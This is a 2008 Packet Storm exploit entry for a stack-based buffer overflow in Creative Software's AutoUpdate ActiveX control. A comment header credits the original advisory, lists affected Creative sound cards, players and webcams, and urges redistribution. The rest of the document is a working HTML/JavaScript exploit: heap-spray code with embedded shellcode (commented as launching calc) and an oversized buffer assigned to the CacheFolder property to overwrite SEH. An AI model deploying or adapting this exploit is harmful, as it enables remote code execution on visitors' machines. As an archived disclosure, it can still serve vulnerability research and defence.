creative-overflow.txt

2008-05-29T00:00:00
ID PACKETSTORM:66783
Type packetstorm
Reporter BitKrush
Modified 2008-05-29T00:00:00

Description

                                        
                                            `<html>  
<!--  
!!!NOT PRIVATE PLEASE DISTRIBUTE!!!  
Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.>  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.  
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security  
ActiveX Download @ http://www.creative.com/su/Product.asp  
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION  
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
Tested On Windows XP SP3 with all patches (like that matters)  
Products Affected:  
the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:  
Sound cards  
Audigy  
Audigy 2  
Audigy 2 LS  
Audigy 2 NX  
Audigy 2 Platinum  
Audigy 2 Platinum eX  
Audigy 2 Value  
Audigy 2 ZS  
Audigy 2 ZS Gamer  
Audigy 2 ZS Notebook  
Audigy 2 ZS Platinum  
Audigy 2 ZS Platinum Pro  
Audigy 2 ZS Video Editor  
Audigy 4 Pro  
Audigy Gamer  
Audigy LS  
Audigy MP3+  
Audigy Platinum  
Audigy Platinum eX  
Live! 24-bit  
Live! 24-bit External  
Live! 5.1  
Live! 5.1 Digital (Dell)  
Live! ADVANCED MB  
MP3 +  
Sound Blaster Audigy 2 ZS Digital Audio  
Sound Blaster Audigy ADVANCED MB  
Sound Blaster X-Fi Fatal1ty  
Wireless Music  
X-Fi Elite Pro  
X-Fi Platinum  
X-Fi XtremeMusic  
  
USB Sound Blaster  
Audigy 2 NX  
MP3 +  
  
Portable Audio  
MuVo  
MuVo NX  
MuVo Slim  
MuVo TX  
MuVo TX FM  
MuVo² X-Trainer  
MuVo²  
MuVo² FM  
NOMAD II 32MB  
NOMAD II MG  
NOMAD IIc  
NOMAD Jukebox 3  
NOMAD Jukebox ZEN  
Rhomba  
  
Portable Media Players  
ZEN Portable Media Center  
ZEN Vision 30GB  
  
MP3 Players  
MuVo  
MuVo 2.0 / MuVo Mix  
MuVo Micro  
MuVo NX  
MuVo Slim  
MuVo Sport C100  
MuVo TX  
MuVo TX FM  
MuVo V200  
MuVo² X-Trainer  
MuVo²  
MuVo² FM  
NOMAD II 32MB  
NOMAD II MG  
NOMAD II MG Limited Edition  
NOMAD IIc  
NOMAD JukeBox  
NOMAD Jukebox 10GB  
NOMAD Jukebox 2  
NOMAD Jukebox 3  
NOMAD Jukebox C  
NOMAD Jukebox ZEN  
NOMAD Jukebox ZEN NX  
NOMAD Jukebox ZEN USB 2.0  
Rhomba  
ZEN 20GB  
ZEN Micro  
ZEN Nano 512MB  
ZEN Nano Plus  
ZEN Neeon 5GB/6GB  
ZEN Portable Media Center  
ZEN Sleek  
ZEN Touch  
ZEN Vision 30GB  
ZEN Xtra  
  
Web Cameras  
Creative PC-CAM 900  
Creative WebCam Vista  
Game Star  
Live! Ultra for Notebooks  
PC-CAM 880  
WebCam Instant  
WebCam Instant  
WebCam Live!  
WebCam Live! Pro  
WebCam Live! Ultra  
WebCam Notebook  
WebCam NX  
WebCam NX Pro  
WebCam NX Ultra  
WebCam Vista  
  
Video  
Audigy 2 ZS Video Editor  
  
Wireless  
Wireless Music  
  
Notebook Products  
Audigy 2 NX  
Audigy 2 ZS Notebook  
Live! 24-bit External  
Live! Ultra for Notebooks  
MP3 +  
WebCam Notebook  
  
Software  
Game Star  
http://us.creative.com/support/downloads/popup_supportproducts.asp  
Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715  
KILL BIT THIS ^^  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
-->  
  
<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>  
<script language='javascript'>  
var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)  
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+  
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+  
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+  
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+  
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+  
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+  
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");  
var mainblk = unescape("%u0c0c%u0c0c");  
var hdr = 20;  
var slck = hdr + sc01.length;  
while (mainblk.length < slck) mainblk += mainblk;  
var fillblk = mainblk.substring(0,slck);  
var blk = mainblk.substring(0,mainblk.length - slck);  
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;  
var memory = new Array();  
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }  
var buf = '';  
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.  
obj1.cachefolder = buf;  
</script>  
</html>  
`